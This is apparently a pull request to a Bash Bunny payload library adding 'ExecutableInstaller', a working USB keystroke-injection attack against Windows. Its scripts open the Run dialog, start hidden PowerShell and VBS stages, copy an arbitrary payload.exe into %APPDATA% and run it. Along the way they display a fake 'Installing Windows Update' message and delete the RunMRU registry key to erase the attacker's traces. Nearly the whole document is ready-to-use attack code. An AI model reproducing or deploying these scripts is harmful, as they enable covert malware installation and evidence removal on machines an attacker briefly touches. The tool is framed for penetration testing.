### PR TITLE
Add ExecutableInstaller payload

### DIFF
--- a/payloads/library/ExecutableInstaller/d.cmd
+++ b/payloads/library/ExecutableInstaller/d.cmd
@@ -1,0 +1,4 @@
+@echo off
+start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
+cscript %~dp0\i.vbs %~dp0\e.cmd
+@exit

--- a/payloads/library/ExecutableInstaller/e.cmd
+++ b/payloads/library/ExecutableInstaller/e.cmd
@@ -1,0 +1,23 @@
+@echo off
+@echo Installing Windows Update
+
+REM Delete registry keys storing Run dialog history
+REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
+
+REM Below is for copying a directory with a payload inside the root directory of the Bash Bunny USB Mass Storage.
+REM echo d | xcopy /C /Q /Y /E %~dp0\..\..\PAYLOAD_FOLDER_IN_ROOT %APPDATA%\PAYLOAD_FOLDER_IN_ROOT
+
+REM Copy payload.exe from the root of the bash Bash Bunny USB Mass Storage (change to whatever you like).
+copy %~dp0\..\..\payload.exe %APPDATA%\payload.exe
+
+REM Below is for executing a payload inside a directory (see comments above). Change --startup to whatever parameters you wish to pass (or remove it).
+REM start "" "%APPDATA%\PAYLOAD_FOLDER_IN_ROOT\payload.exe" --startup
+
+REM Launch payload.exe with the startup parameter. Change --startup to whatever parameters you wish to pass (or remove it).
+start "" "%APPDATA%\payload.exe" --startup
+
+REM Blink CAPSLOCK key (from usb_exfiltrator)
+start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
+
+@cls
+@exit

--- a/payloads/library/ExecutableInstaller/i.vbs
+++ b/payloads/library/ExecutableInstaller/i.vbs
@@ -1,0 +1,1 @@
+CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

--- a/payloads/library/ExecutableInstaller/payload.txt
+++ b/payloads/library/ExecutableInstaller/payload.txt
@@ -1,0 +1,22 @@
+#!/bin/bash
+#
+# Title:         ExecutableInstaller
+# Author:        IMcPwn
+# Version:       1.0
+# Target:        Windows 7+
+# 
+# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
+# which in turn executes e.cmd invisibly using i.vbs
+# which in turn copies payload.exe from the root of the Bash Bunny and then executes it
+# using the --startup parameter. Change these settings inside of e.cmd.
+#
+LED R
+ATTACKMODE HID STORAGE
+QUACK GUI r
+QUACK DELAY 100
+# TODO: Verify $SWITCH_POSITION
+QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\$SWITCH_POSITION\d.cmd')"
+QUACK ENTER
+
+# Green LED for finished
+LED G

--- a/payloads/library/ExecutableInstaller/readme.md
+++ b/payloads/library/ExecutableInstaller/readme.md
@@ -1,0 +1,27 @@
+# ExecutableInstaller for Bash Bunnys
+
+* Author: IMcPwn
+* Version: Version 1.0
+* Target: Windows
+
+## Description
+
+Copies an executable (or executable in a directory) from the Bash Bunny USB Mass Storage
+to %APPDATA% and then executes it with the --startup parameter (or whatever parameter you want).
+
+## Configuration
+
+By default the staged payload copies the payload payload.exe from the root of the Bash Bunny, rename this to whatever you like inside
+by editing e.cmd.
+The payload copies to %APPDATA%, change this to wherever you like by editing e.cmd.
+You may also copy a payload inside a directory, see comments in e.cmd.
+
+## STATUS
+
+| LED                | Status                                       |
+| ------------------ | -------------------------------------------- |
+| Red                | Attack Setup                                 |
+| Green              | Attack Complete                              |
+
+## Discussion
+[Hak5 Forum Thread](https://forums.hak5.org/index.php?/forum/92-bash-bunny/ "Hak5 Forum Thread")


### PR DESCRIPTION
This payload copies an executable or executable and a folder to a location (default %APPDATA%) and launches it with any parameters specified.

Don't merge until #4 or similar is accepted.